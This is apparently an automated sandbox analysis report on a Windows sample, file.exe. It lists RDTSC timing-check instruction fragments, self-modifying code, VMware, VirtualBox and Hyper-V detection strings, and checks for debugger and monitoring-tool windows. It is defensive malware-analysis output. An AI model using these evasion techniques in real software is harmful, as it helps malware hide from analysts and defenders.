    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 918741 second address: 918757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop eax 0x0000000c jc 00007F2CB4F07475h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91F235 second address: 91F23E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91F23E second address: 91F244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91F244 second address: 91F24E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2CB4E5A4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91F24E second address: 91F253 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91F65F second address: 91F66F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2CB4E5A4C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91F799 second address: 91F7B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F2CB4F0745Eh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920295 second address: 92029B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92029B second address: 9202A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2CB4F07456h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9202A6 second address: 9202BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4E5A4CDh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92098E second address: 9209AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4F07466h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926FCB second address: 926FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926FD4 second address: 926FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FF7C second address: 86FF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 jl 00007F2CB4E5A4C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932818 second address: 932827 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4F0745Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934EC1 second address: 934EC7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93DE0D second address: 93DE1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F2CB4F0745Eh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93DE1C second address: 93DE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4E5A4CAh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F2CB4E5A4CFh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93DE3E second address: 93DE44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93DE44 second address: 93DE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007F2CB4E5A4D2h 0x0000000d pushad 0x0000000e jmp 00007F2CB4E5A4D8h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 942766 second address: 94276A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94276A second address: 94278C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2CB4E5A4D3h 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955F94 second address: 955F98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955F98 second address: 955F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9548BC second address: 9548C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954D31 second address: 954D3F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2CB4E5A4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954D3F second address: 954D45 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95506E second address: 955079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955079 second address: 95507F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959C07 second address: 959C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95BC46 second address: 95BC5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2CB4F07460h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B7AF second address: 95B7BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2CB4E5A4C6h 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B93E second address: 95B942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B942 second address: 95B992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2CB4E5A4C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F2CB4E5A4D9h 0x00000013 jmp 00007F2CB4E5A4D9h 0x00000018 pushad 0x00000019 jmp 00007F2CB4E5A4CDh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B992 second address: 95B9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F2CB4F0745Ch 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9663FD second address: 966413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F2CB4E5A4CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966413 second address: 966422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966422 second address: 966437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4E5A4D0h 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966437 second address: 966441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F2CB4F07456h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966441 second address: 966459 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2CB4E5A4CFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96BC67 second address: 96BC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96BC72 second address: 96BC78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96BC78 second address: 96BC7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96945F second address: 969472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2CB4E5A4CDh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 969472 second address: 969484 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jnc 00007F2CB4F07456h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 978C95 second address: 978C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2CB4E5A4C6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 978C9F second address: 978CA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97CC46 second address: 97CC54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push edi 0x00000006 pop edi 0x00000007 jng 00007F2CB4E5A4C6h 0x0000000d pop esi 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995217 second address: 995221 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2CB4F07456h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9943C2 second address: 9943E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F2CB4E5A4CAh 0x0000000b jmp 00007F2CB4E5A4CAh 0x00000010 jc 00007F2CB4E5A4C6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9943E4 second address: 9943F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F2CB4F07456h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9949E2 second address: 9949E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9949E8 second address: 9949EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9949EC second address: 9949F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2CB4E5A4C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 994B55 second address: 994B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2CB4F07456h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push ebx 0x0000000e jnc 00007F2CB4F07456h 0x00000014 pop ebx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 994DE1 second address: 994DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2CB4E5A4C6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999588 second address: 99958C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99958C second address: 999625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 mov dh, ah 0x0000000a push 00000004h 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F2CB4E5A4C8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov edx, eax 0x00000028 call 00007F2CB4E5A4C9h 0x0000002d jmp 00007F2CB4E5A4D3h 0x00000032 push eax 0x00000033 pushad 0x00000034 jc 00007F2CB4E5A4CCh 0x0000003a jc 00007F2CB4E5A4C6h 0x00000040 jmp 00007F2CB4E5A4D2h 0x00000045 popad 0x00000046 mov eax, dword ptr [esp+04h] 0x0000004a jbe 00007F2CB4E5A4CAh 0x00000050 push ebx 0x00000051 push edx 0x00000052 pop edx 0x00000053 pop ebx 0x00000054 mov eax, dword ptr [eax] 0x00000056 pushad 0x00000057 jmp 00007F2CB4E5A4D2h 0x0000005c jl 00007F2CB4E5A4CCh 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999625 second address: 999643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 jc 00007F2CB4F0746Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2CB4F0745Dh 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99990A second address: 999949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2CB4E5A4C6h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d jp 00007F2CB4E5A4D1h 0x00000013 push dword ptr [ebp+122D2167h] 0x00000019 push eax 0x0000001a mov edx, dword ptr [ebp+122D324Ch] 0x00000020 pop edx 0x00000021 call 00007F2CB4E5A4C9h 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jnp 00007F2CB4E5A4C6h 0x00000030 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999949 second address: 999953 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2CB4F07456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999953 second address: 999959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999959 second address: 99995D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99AD8A second address: 99AD9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007F2CB4E5A4C6h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50B45 second address: 4A50B4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50B4B second address: 4A50B79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax+00000860h] 0x0000000e jmp 00007F2CB4E5A4D5h 0x00000013 test eax, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov cx, bx 0x0000001b mov esi, edx 0x0000001d popad 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50B79 second address: 4A50BA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4F07460h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F2D25EED628h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2CB4F0745Ah 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50BA1 second address: 4A50BA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Tries to evade debugger and weak emulator (self modifying code)
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 703A4A instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 703AB7 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8A34C4 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8A37EB instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8B8C23 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 92BD4B instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exe TID: 7600Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
    Source: file.exe, file.exe, 00000000.00000002.1564546528.0000000000888000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: Amcache.hve.5.drBinary or memory string: VMware
    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
    Source: file.exe, 00000000.00000002.1565088782.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@<
    Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: file.exe, 00000000.00000003.1347379364.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.5.drBinary or memory string: vmci.sys
    Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.5.drBinary or memory string: VMware20,1
    Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: file.exe, 00000000.00000002.1564546528.0000000000888000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
    Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Hides threads from debuggers
    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (window names)
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
